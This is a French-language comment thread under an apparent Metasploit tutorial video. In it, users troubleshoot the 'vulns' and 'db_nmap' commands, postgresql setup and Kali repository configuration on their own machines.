      exemple de ce qui est arrivée:
      msf>vulns
      msf>

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      ikkeeeurss parce que la commande vulns ne fonctionne pas avec tout les systèmes d'exploitation. si tu veux de bons résultats lors d'une analyse de vulnérabilité privilégie des scanner de vulnérabilité comme openvas ou nessus avant de passer à l'exploitation

    • @ikkeeeurss3309
      @ikkeeeurss3309 7 лет назад

      ok merci :p

  • @coopflac
    @coopflac 7 лет назад

    Pour moi sa ne marchent pas quand je mes db_nmap -v -sS -A mon_ip_locale
    il me donne juste avec
    host
    Ipxe

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +Valentin a tu mis à jour ta distribution ? Et est ce que ta sources.list est correct ? Et est ce que tu démarre bien le service postgresql et cliquez sur l'icône de metasploit lors de la première utilisation afin qu'il puisse créer les dB ?

    • @coopflac
      @coopflac 7 лет назад

      Ma distribution et bien a jour pour la sources.list je ne c'est pas le service postgresql aussi je ne c'est pas car je suis sous 2.0 et oui j'ai bien cliqué la première fois sur l'icone de metasploit

    • @informatrixsecuriteinforma6057
      @informatrixsecuriteinforma6057  7 лет назад

      +Valentin comment tu peut savoir si ta distribution est bien à jour si tu n'a pas modifier la sources.list afin d'ajouter les dépôts de kali . D'ailleurs tu fait bien de me le dire sa va me permettre de faire un tutoriel de soutien pour les base d'utilisation de linux car tu n'es pas tout seul dans ce cas.
      Concernant le service postgresql commence par la première vidéo.

    • @coopflac
      @coopflac 7 лет назад

      Informatrix : sécurité informatique J'ai la version v4.13.20-dev de metasploit (ps quand je fait db_status il me mes postgresql connected to msf ) ps quand je fait service metasploit start
      il me met l'erreur Failed to start metasploit.service: Unit metasploit.service not found. HELP !

    • @coopflac
      @coopflac 7 лет назад

      Informatrix : sécurité informatique Ha oui mince j'avais pas tester bon bah j'ai mis les dépôts http.kali.org/kali sana main non-free contrib ^^'